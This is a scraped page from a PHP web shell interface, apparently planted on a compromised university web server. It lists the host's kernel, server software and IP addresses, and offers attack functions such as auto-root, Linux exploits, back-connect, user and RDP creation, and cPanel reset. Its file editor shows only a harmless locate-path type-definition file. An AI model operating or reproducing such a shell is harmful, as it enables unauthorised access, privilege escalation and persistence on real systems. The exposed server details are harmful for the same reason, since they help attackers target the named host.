Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.148.106.131
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
locate-path /
[ HOME SHELL ]
Name
Size
Permission
Action
index.d.ts
1.54
KB
-rw-r--r--
index.js
1.3
KB
-rw-r--r--
package.json
720
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
declare namespace locatePath { interface Options { /** Current working directory. @default process.cwd() */ readonly cwd?: string; /** Type of path to match. @default 'file' */ readonly type?: 'file' | 'directory'; /** Allow symbolic links to match if they point to the requested path type. @default true */ readonly allowSymlinks?: boolean; } interface AsyncOptions extends Options { /** Number of concurrently pending promises. Minimum: `1`. @default Infinity */ readonly concurrency?: number; /** Preserve `paths` order when searching. Disable this to improve performance if you don't care about the order. @default true */ readonly preserveOrder?: boolean; } } declare const locatePath: { /** Get the first path that exists on disk of multiple paths. @param paths - Paths to check. @returns The first path that exists or `undefined` if none exists. @example ``` import locatePath = require('locate-path'); const files = [ 'unicorn.png', 'rainbow.png', // Only this one actually exists on disk 'pony.png' ]; (async () => { console(await locatePath(files)); //=> 'rainbow' })(); ``` */ (paths: Iterable<string>, options?: locatePath.AsyncOptions): Promise< string | undefined >; /** Synchronously get the first path that exists on disk of multiple paths. @param paths - Paths to check. @returns The first path that exists or `undefined` if none exists. */ sync( paths: Iterable<string>, options?: locatePath.Options ): string | undefined; }; export = locatePath;
Close